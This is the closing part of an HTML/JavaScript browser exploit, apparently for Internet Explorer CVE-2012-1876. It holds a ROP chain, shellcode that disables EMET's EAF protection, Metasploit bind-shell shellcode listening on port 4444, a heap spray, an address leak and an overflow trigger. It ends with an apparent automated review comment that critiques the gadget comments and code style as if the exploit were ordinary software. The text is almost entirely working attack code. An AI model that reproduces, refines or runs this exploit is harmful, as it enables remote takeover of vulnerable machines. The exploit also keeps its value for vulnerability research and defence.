shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02
// Execute the Corbomite bluff to disarm EAF
shellcode+= unescape("%uc0b8%u6d10");
shellcode+= unescape("%u8b07%u8b00");
shellcode+= unescape("%u6800%u10c8");
shellcode+= unescape("%u076d%ud0ff");
shellcode+= unescape("%ud468%u6d10");
shellcode+= unescape("%u5007%uc4b8");
shellcode+= unescape("%u6d10%u8b07");
shellcode+= unescape("%u8b00%uff00");
shellcode+= unescape("%u8bd0%u81f0");
shellcode+= unescape("%uccec%u0002");
shellcode+= unescape("%uc700%u2404");
shellcode+= unescape("%u0010%u0001");
shellcode+= unescape("%ufc8b%uccb9");
shellcode+= unescape("%u0002%u8300");
shellcode+= unescape("%u04c7%ue983");
shellcode+= unescape("%u3304%uf3c0");
shellcode+= unescape("%u54aa%ufe6a");
shellcode+= unescape("%ud6ff%u9090");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u29eb"); // NOPs
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW
shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress
shellcode+= "NTDLL";
shellcode+= unescape("%u0000");
shellcode+= unescape("%u744e%u6553"); // NtSetContextThread
shellcode+= unescape("%u4374%u6e6f");
shellcode+= unescape("%u6574%u7478");
shellcode+= unescape("%u6854%u6572");
shellcode+= unescape("%u6461%u0000");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end
// Bind shellcode on 4444 :)
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :)
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
// Total spray should be 1000
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);
shellcode+= padding;
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
function leak(){
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16);
//alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50);
}
function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1245880";
evil_col.span = "44";
}
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>
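Review bot: two comments in the ROP chain do not match the gadgets they label, which matters because readers follow the chain by those comments: `shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP` uses rop7/rop8, which the offset table defines as `cbuttonlayout + 12377; // POP EBX`, and `// Size 0x00001024` describes the literal 0x1024 (4132 bytes), not a page-rounded 0x1000. Style-wise, `var rop` is redeclared dozens of times and the loop counter in `for (i=0; i<14; i++)` is never declared, so it leaks into global scope; one `var rop;` plus `var i` would do. The more important documentation gap is that the EMET disable stages use absolute addresses (`%u101C%u076d`, i.e. 0x076d101c, and `mov eax, 0x076d10c0` encoded in the raw bytes `%uc0b8%u6d10`) while every mshtml gadget is derived from the leaked `cbuttonlayout`; the header should state that the chain is pinned to that specific EMET 4.1.x build and load address, so that defenders understand the claim "full ASLR bypass" rests on EMET's own module being at a predictable location and that updating either IE (CVE-2012-1876 was patched by Microsoft in 2012) or EMET invalidates the hardcoded values.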